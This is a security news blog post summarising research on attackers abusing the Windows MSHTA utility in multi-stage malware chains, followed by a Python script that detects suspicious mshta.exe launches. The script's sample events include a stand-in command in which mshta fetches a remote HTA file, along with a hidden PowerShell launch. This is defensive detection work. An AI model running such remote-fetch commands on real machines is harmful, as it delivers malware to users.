Microsoft’s Legacy MSHTA Utility Tool Abused in Attacks, Exploited to Deliver Malware
Bitdefender has released new research documenting how attackers continue to abuse Microsoft’s legacy MSHTA utility to deliver malware through stealthy, multi-stage attack chains. The abuse of MSHTA affects both businesses and consumers who run Windows.
Despite Internet Explorer reaching end of support years ago, MSHTA remains enabled by default on Windows systems and continues to be heavily exploited by cybercriminals to execute malicious scripts, retrieve remote payloads, and evade detection using trusted Microsoft-signed processes.
Key findings include:
- MSHTA used to silently deliver multiple malware families, including LummaStealer, Amatera, ClipBanker, PurpleFox, and CountLoader
- Multi-stage, fileless attack chains using HTA scripts, PowerShell, and in-memory payloads to bypass traditional detection tools
- Use of ClickFix-style lures and fake software downloads designed to trick users into manually launching malware infections
The research highlights how legacy Windows utilities continue to pose risks to general users and organizations by providing attackers with trusted tools that blend malicious activity into legitimate system behavior.
You can read the research here: https://www.bitdefender.com/en-us/blog/labs/microsofts-mshta-legacy-malware-windows
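The two signals the findings above describe, mshta.exe fetching a remote HTA and then handing off to PowerShell or another script host, can be checked in process-creation telemetry. The following detection logic is an added example, not code from Bitdefender or the research post; the ProcEvent shape, the explorer.exe heuristic for interactive launches, and the sample events (hostnames and paths are placeholders) are assumptions made here.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    """Minimal process-creation record (Sysmon Event ID 1 or EDR telemetry)."""
    image: str          # full path of the new process
    command_line: str
    parent_image: str   # full path of the parent process

URL_RE = re.compile(r"\bhttps?://\S+", re.IGNORECASE)
# Script hosts that mshta.exe rarely has a legitimate reason to spawn
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}

def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(ev: ProcEvent) -> list[str]:
    """Return the reasons an event is suspicious; an empty list means no signal."""
    reasons = []
    image, parent = _basename(ev.image), _basename(ev.parent_image)
    if image == "mshta.exe" and URL_RE.search(ev.command_line):
        # Stage 1 of the chains above: mshta.exe retrieving an HTA from a remote host
        reasons.append("mshta.exe launched with a remote URL argument")
        if parent == "explorer.exe":
            # Heuristic (assumption): Run-dialog or shortcut launch fits a ClickFix-style lure
            reasons.append("interactive launch from explorer.exe")
    if image in SCRIPT_HOSTS and parent == "mshta.exe":
        # Stage 2: the HTA handing execution to PowerShell or another script host
        reasons.append(f"mshta.exe spawned {image}")
    return reasons

def scan(events: list[ProcEvent]) -> list[tuple[ProcEvent, list[str]]]:
    """Apply classify() to a batch and keep only the flagged events."""
    return [(ev, r) for ev in events for r in [classify(ev)] if r]

# Constructed sample telemetry; the hostname and paths are placeholders, not real indicators
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\mshta.exe",
              "mshta.exe https://update-check.invalid/verify.hta",
              r"C:\Windows\explorer.exe"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell.exe -NoProfile -WindowStyle Hidden -Command "<stage 2 omitted>"',
              r"C:\Windows\System32\mshta.exe"),
    ProcEvent(r"C:\Windows\System32\mshta.exe",   # local vendor-installed HTA: no signal
              r'mshta.exe "C:\Program Files\ExampleVendor\helper.hta"',
              r"C:\Program Files\ExampleVendor\launcher.exe"),
]
```

Running scan(SAMPLE_EVENTS) flags the first two events and leaves the local, vendor-launched HTA alone; in production the same logic would be fed from Sysmon or EDR process-creation events rather than the embedded list.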
Related
This entry was posted on May 19, 2026 at 9:02 am and is filed under Commentary with tags Bitdefender. You can follow any responses to this entry through the RSS 2.0 feed.
You can leave a response, or trackback from your own site.